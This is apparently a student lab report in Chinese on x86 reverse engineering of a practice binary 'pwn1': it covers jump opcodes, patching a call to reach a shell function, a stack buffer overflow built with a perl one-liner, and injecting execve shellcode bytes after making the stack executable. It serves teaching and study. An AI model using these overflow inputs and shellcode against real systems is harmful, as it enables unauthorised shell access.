20155301PC平台逆向破解

20155301PC平台逆向破解

1.掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码

NOP:NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(机器码:90)

JNE:条件转移指令,如果不相等则跳转。(机器码:75)

JE:条件转移指令,如果相等则跳转。(机器码:74)

JMP:无条件转移指令。段内直接短转Jmp

short(机器码:EB)段内直接近转移Jmp

near(机器码:E9)段内间接转移Jmp

word(机器码:FF)段间直接(远)转移Jmp

far(机器码:EA)

CMP:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。

2.掌握objdump命令、vi基本命令、查看寄存器的命令

1.objdump -d test:反汇编test

2.info r:查看寄存器

3.:%!xxd:查看二进制文件

实验过程

1.利用

objdump -d + 文件名

将可执行程序进行反汇编,变成机器指令

2.利用vi编辑器打开文件,并用:%!xxd将文件以16进制的形式打开

3.我们如果想要用到shell功能,就要使main函数不调用foo函数,而是调用getshell函数,这一点我们可以通过直接修改机器指令做到。

4.找到与调用foo函数有关的机器指令,由图可得,call 8048491是汇编指令,即,将调用位于地址8048491处的foo函数;对应机器指令为e8 d7ffffff,所以我们要将机器指令中foo函数的物理地址改为getshell函数的物理地址

5.由汇编指令及其对应的机器指令,我们可得:0xd7ffffff+0x80484ba = 0x8048491
即:call机器码 = 跳转地址 - call指令的下一个eip 所以可以算出调用getshell函数的机器码为e8 c3ffffff,所以我们只要将d7修改为c3即可

6.输入/e8 d7搜索所在位置,找到后按回车,按i进入编辑模式,将d7改为c3,按 esc退出编辑模式,输入:%!xxd -r退出16进制模式,保存退出。

7.运行程序

通过构造输入参数,造成BOF攻击,改变程序执行流

1.利用gdb调试确认输入字符串哪几个字符会覆盖到返回地址,即输入多少字符会出错。

2.找到导致出错的字符位置,并查看当前寄存器的值,尤其是eip的值

3.可以观察到是最后的“1234”四个字符覆盖了eip寄存器的值,那只要把这四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell。

4.确认用什么值来覆盖返回地址,即将“1234”变成shellcode的内存地址,通过前一步的反汇编结果我们知道,shellcode的内存地址是0804847d。

5.修改”1234“的值之前要弄清机器是大端还是小段,在之前测试字符溢出的过程中,1234覆盖了eip的值,此时eip的值为0x34333231,1的ASCII的值是49,16进制为“31”可以知道机器是小端,所以正确的输入是“11111111222222223333333344444444\x7d\x84\x04\x08”

6.通过建立一个输入文件,因为在终端输入的时候没法通过键盘输入\x7d\x84\x04\x08这样的数字,这时就需要用到以下的命令构造输入文件。

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

7.然后将input的输入,通过管道符“|”,作为pwn1的输入

(cat input; cat) | ./pwn1

注入Shellcode并执行

1.准备工作:结合CPU的页面管理机制,通过DEP/NX用来将堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆栈上,也执行不了,所以我们先要安装“execstack”,之后通过execstack -s pwn1 设置堆栈可执行,execstack -q pwn1 查询文件的堆栈是否可执行,execstack -q pwn1 查询文件的堆栈是否可执行
准备工作结束后

2.准备工作结束后,输入下列代码

perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。
特别提醒:最后一个字符千万不能是\x0a。不然下面的操作就做不了了。

3.接下来我们来确定\x4\x3\x2\x1到底该填什么。首先打开一个终端注入这段攻击buf:

(cat input_shellcode;cat) | ./pwn1

4.先找到进程号,输入

ps -ef | grep pwn1

①找到有关pwn1的进程,查看进程号。

②启动gdb调试这个进程,通过设置断点,来查看注入buf的内存地址,并确定函数的返回函数的内存地址。

③查看esp寄存器的值,并不断往前找shellcode开始的地方,将返回地址改为找到shellcode返回地址加4个字节的地址。

④用ls命令测试是否成功改到shell code,结构失败

5.重新开始,将③的地址变成shellcode地址上一步的结束地址,发现可以输入ls等shellcode命令。

posted @ 2018-03-11 11:05  滕树晨  阅读(246)  评论(0编辑  收藏  举报